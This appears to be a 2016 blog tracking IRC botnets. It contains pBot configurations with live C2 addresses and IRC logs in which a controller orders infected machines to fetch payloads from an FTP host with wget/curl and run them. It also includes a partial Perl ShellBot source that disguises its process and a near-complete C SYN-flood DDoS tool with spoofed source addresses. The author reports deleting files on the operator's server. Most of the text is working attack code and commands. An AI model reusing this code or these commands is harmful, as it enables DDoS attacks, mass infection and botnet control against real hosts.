Pages

Saturday, December 10, 2016

IRC - drona.bot.nu - Botnet



Spreading ftp server : 
ft*://kobra:kobra@195.234.176.57/
bot config ////////pbot.php////////
class pBot
{
    var $config = array("server" => "112.124.47.140", "port" => "2222", "pass" => "", 
"prefix" => "NOU", "maxrand" => "6", "chan" => "#pma", "chan2" => "#pma2", 
"key" => "NEW", "modes" => "+pwisx", "password" => "123", "trigger" => ".", 
"hostauth" => "ANONYMOUS.XYZ", "limit" => "300" 
        );
/////////end//////////
 


Also first no dns at this poit to prevent suspending but soon as the new infected machine joins IRC auto msg from user "w" whith an
mrc script commands the bot to download new bot file :


Here the msg from "w"

[20:59] <w> .user ro
[20:59] <w> .uname
[20:59] <w> .exec killall -9 perl
[20:59] <w> .exec cd /tmp/;wget ***://user:ggallery@66.71.191.82/a.pdf ; 
curl -O f*p://user:ggallery@66.71.191.82/a.pdf ; 
fetch f*p://user:ggallery@66.71.191.82/a.pdf ; 
lwp-download ftp://user:ggallery@66.71.191.82/a.pdf ; perl a.pdf ; rm -rf a.*
[20:59] <w> .exec cd /dev/shm/;wget ***://user:ggallery@66.71.191.82/drn.tgz;tar xvf drn.tgz;rm -rf drn.tgz;cd .p;
./autorun;./run;
[20:59] <w> .download *****/lewl.ucoz.site/sexy.exe D:\sexy.exe
[20:59] <w> .exec start sexy.exe
[20:59] <w> .download ****//lewl.ucoz.site/sexy.exe C:\sexy.exe
[20:59] <w> .exec start D:\sexy.exe
[20:59] <w> .exec start C:\sexy.exe
[20:59] <w> .exec del sexy.exe C:\sexy.exe
[20:59] <w> .exec rm -rf sexy.exe C:\sexy.exe perl*
[20:59] <w> .exec cd /dev/shm ;wget f***://user:ggallery@66.71.191.82/drn.tgz;tar xvf drn.tgz;rm -rf drn.tgz;cd .p;./run;
[20:59] <w> .start D:\sexy.exe
[20:59] <w> .start C:\sexy.exe
[20:59] <w> .die
 


Also lets check ftp : 3 files
  • a.pdf // new bot whith the dns
  • drn.tgz // Linux backdoor and irc bot
  • gscan.tgz // His personal ZeMu setup

And in a.pdf we see hes real dns and one photo down too




// Dont download if u dont know what u doing .... drn.tgz : Sample
 And Sexy.exe is a irc bot to mIRC base , packed as a SFX arschive
some files : 


And some other things found on his ftp  , a yeah he fortgot to give limited access to that ftp user or just dumb to user anonymous user ... anyways all his shit rm -f * . If someone interested in this shit just email me :

 

Monday, November 28, 2016

ragebot - scan1.zapto.org - t0nixx [SKID]


>> NICK raGe|cjxtdsvUOE
>> USER mnquru "fo1.net" "rage" :mnquru
<< NOTICE AUTH :*** eh...
<< 001 raGe|cjxtdsvUOE
<< 002 raGe|cjxtdsvUOE
<< 003 raGe|cjxtdsvUOE
<< 004 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 422 raGe|cjxtdsvUOE :MOTD File is missing
<< MODE raGe|cjxtdsvUOE :+iwG
<< JOIN :#!b!#
>> JOIN #vnc #vnc
<< JOIN :#vnc
<< 332 raGe|cjxtdsvUOE #vnc :.xpl 94 1 23.26.x.x 3 1 23.26.x.x 3 1 / .scan 94 1 23.26.x.x 3 1 23.26.255.255 3 1
<< 333 raGe|cjxtdsvUOE #vnc akanz 1480289648
>> PRIVMSG #vnc :\x0314,1.:[\x0315,1rAGEBoT\x0314,1]:.\x0315,1 range: 23.26.x.x with 94 threads. (autorooting)
>> PING :NhG.server
>> PONG NhG.server
>> JOIN #vnc #vnc

Saturday, November 19, 2016

5k - Perl/ShellBot.B ddos - IRC









# TeaMrx Perlbot vS xeQT


my @mast3rs = ("Low","Loww");


my @admchan=("#Perli");

$servidor='188.119.151.131' unless $servidor;  // his server 


my $xeqt = "!x";
my $homedir = "/tmp";
my $shellaccess = 1;
my $xstats = 1;
my $pacotes = 1;
my $linas_max = 5;
my $sleep = 6;
my $portime = 4;

my @fakeps = ("/usr/local/apache/bin/httpd -DSSL",
    "/usr/sbin/httpd -k start -DSSL",
    "/usr/sbin/httpd",
    "spamd child",
    "httpd");

my @nickname = ("TeaMrx","......","xQt");

my @xident = ("noway",......yn","ju");

my @xname = ("Googurl (C) 2006 xeQt","........","Team Work","jet lie");

#################
# Random Ports
#################
my @rports = ("6667");

my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001",
    "\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001",
    "\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001",
    "\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001",
    "\001Snak for Macintosh 4.9.8 English\001",
    "\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001",
    "\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001",
    "\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001",
    "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001",
    "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001",
    "\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001",
    "\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001",
    "\001ircN 8.00  -  he tries to tell me what I put inside of me  - \001",
    "\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001",
    "\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001",
    "\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001",
    "\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001",
    "\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001",
    "\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1á9] : Keep it to yourself!\001",
    "\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001",
    "\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001",
    "\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10 - running on FreeBSD i386\001",
    "\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there\001",
    "\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there\001");

# Default quick scan ports
my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");

# xeQt

#my $nick = "sshb0t1";
my $nick = $nickname[rand scalar @nickname];
my $realname = $xname[rand scalar @xname];
my $ircname = $xident[rand scalar @xident];
my $porta = $rports[rand scalar @rports];
my $xproc = $fakeps[rand scalar @fakeps];
my $Mrx = $Mrx[rand scalar @Mrx];
my $version = 'vSm0d (C) TeaMrx';

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

use IO::Socket;
use Socket;
use IO::Select;
chdir("$homedir");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$xproc"."\0";
my $pid=fork;
exit if $pid;
die "[x] -> Cannot fork into background: $!" unless defined($pid);
my %irc_servers;
my %DCC;
my $dcc_sel = new IO::Select->new();

sub getnick {
  return "$nickname[rand scalar @nickname]".int(rand(1000));
}

neeedd to delete some shit coz site gets blacklisted

  }

ahh found this in his spreaading ftp maybe interesting to someone ....


/* "DOMINATE" Attack Script, this script was so difficult to make, it required taking the very public ESSYN
attack script, and replacing "tcph->res2 = 1;" to "tcph->res2 = 3;" in the "setup_tcp_header" function.
Anybody who purchased this script for $300 BTC, yup, it's literally changing a 1 to a 3.
*/
#include unistd.h
#include time.h
#include sys/types.h
#include sys/socket.h
#include sys/ioctl.h
#include string.h
#include stdlib.h
#include stdio.h
#include pthread.h
#include netinet/tcp.h
#include netinet/ip.h
#include netinet/in.h
#include netinet/if_ether.h
#include netdb.h
#include net/if.h
#include arpa/inet.h

#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9

static unsigned long int Q[4096], c = 362436;
static unsigned int floodport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;

void init_rand(unsigned long int x)
{
 int i;
 Q[0] = x;
 Q[1] = x + PHI;
 Q[2] = x + PHI + PHI;
 for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
 unsigned long long int t, a = 18782LL;
 static unsigned long int i = 4095;
 unsigned long int x, r = 0xfffffffe;
 i = (i + 1) & 4095;
 t = a * Q[i] + c;
 c = (t >> 32);
 x = t + c;
 if (x < c) {
  x++;
  c++;
 }
 return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
 register unsigned long sum = 0;
 while( count > 1 ) { sum += *buf++; count -= 2; }
 if(count > 0) { sum += *(unsigned char *)buf; }
 while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
 return (unsigned short)(~sum);
}

unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {

 struct tcp_pseudo
 {
  unsigned long src_addr;
  unsigned long dst_addr;
  unsigned char zero;
  unsigned char proto;
  unsigned short length;
 } pseudohead;
 unsigned short total_len = iph->tot_len;
 pseudohead.src_addr=iph->saddr;
 pseudohead.dst_addr=iph->daddr;
 pseudohead.zero=0;
 pseudohead.proto=IPPROTO_TCP;
 pseudohead.length=htons(sizeof(struct tcphdr));
 int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
 unsigned short *tcp = malloc(totaltcp_len);
 memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
 memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
 unsigned short output = csum(tcp,totaltcp_len);
 free(tcp);
 return output;
}

void setup_ip_header(struct iphdr *iph)
{
 iph->ihl = 5;
 iph->version = 4;
 iph->tos = 0;
 iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
 iph->id = htonl(54321);
 iph->frag_off = 0;
 iph->ttl = MAXTTL;
 iph->protocol = 6;
 iph->check = 0;
 iph->saddr = inet_addr("192.168.3.100");
}

void setup_tcp_header(struct tcphdr *tcph)
{
 tcph->source = htons(5678);
 tcph->seq = rand();
 tcph->ack_seq = 0;
 tcph->res2 = 3;
 tcph->doff = 5;
 tcph->syn = 1;
 tcph->window = htonl(65535);
 tcph->check = 0;
 tcph->urg_ptr = 0;
}

void *flood(void *par1)
{
 char *td = (char *)par1;
 char datagram[MAX_PACKET_SIZE];
 struct iphdr *iph = (struct iphdr *)datagram;
 struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
 
 struct sockaddr_in sin;
 sin.sin_family = AF_INET;
 sin.sin_port = htons(floodport);
 sin.sin_addr.s_addr = inet_addr(td);

 int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
 if(s < 0){
  fprintf(stderr, "Could not open raw socket.\n");
  exit(-1);
 }
 memset(datagram, 0, MAX_PACKET_SIZE);
 setup_ip_header(iph);
 setup_tcp_header(tcph);

 tcph->dest = htons(floodport);

 iph->daddr = sin.sin_addr.s_addr;
 iph->check = csum ((unsigned short *) datagram, iph->tot_len);

 int tmp = 1;
 const int *val = &tmp;
 if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
  fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
  exit(-1);
 }

 init_rand(time(NULL));
 register unsigned int i;
 i = 0;
 while(1){
  sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));

  iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
  iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
  iph->check = csum ((unsigned short *) datagram, iph->tot_len);
  tcph->seq = rand_cmwc() & 0xFFFF;
  tcph->source = htons(rand_cmwc() & 0xFFFF);
  tcph->check = 0;
  tcph->check = tcpcsum(iph, tcph);
  
  pps++;
  if(i >= limiter)
  {
   i = 0;
   usleep(sleeptime);
  }
  i++;
 }
}
int main(int argc, char *argv[ ])
{
 if(argc < 6){
  fprintf(stderr, "Invalid parameters!\n");
  fprintf(stdout, "Usage: %s     


Sunday, November 13, 2016

pBot Skidd - 93.158.200.94 - IRC




// users 
9/tcp  open  irc     Unreal ircd
| irc-info: 
|   server: irc.MoneyZ.gov.GoV
|   version: Unreal3.2.10.2. irc.MoneyZ.gov.GoV 
|   servers: 1
|   chans: 2
|   users: 246
|   lservers: 0
|   lusers: 246

//confg
class pBot
{
 var $config = array("server"=>"93.158.200.94", "port"=>"9", "key"=>"", "prefix"=>"botID", "maxrand"=>"8", "chan"=>"#-|Bots", "trigger"=>"", "password"=>"", "auth"=>"MoneyZ.gov");
 var $users = array();
 function start() {
    while(true)
 {

Saturday, November 12, 2016

Bot - l.lolole.net - IRC

DNS : l.lolole.net


<< NOTICE AUTH :*** Looking up your hostname...
<< NOTICE AUTH :*** Found your hostname
>> USER dk dk dk dk
>> NICK dkacoxfdb
<< 001 dkacoxfdb
<< 002 dkacoxfdb :               M0dded by uNkn0wn Crew
<< 003 dkacoxfdb
<< 004 dkacoxfdb :          www.uNkn0wn.eu - iD@uNkn0wn.eu
<< 005 dkacoxfdb
<< 005 dkacoxfdb
<< 005 dkacoxfdb
<< 422 dkacoxfdb :MOTD File is missing
<< MODE dkacoxfdb :+iwG
>> JOIN #k
<< JOIN :#k
>> PING :E.tk
>> PONG :E.tk



testhttps://malwr.com/analysis/YThlNzM5N2JlNjU1NGIwNjg0ZWY3Y2YwYzgwNTcxYWI/share/e34eba54ecbb465a9c40c221949ac034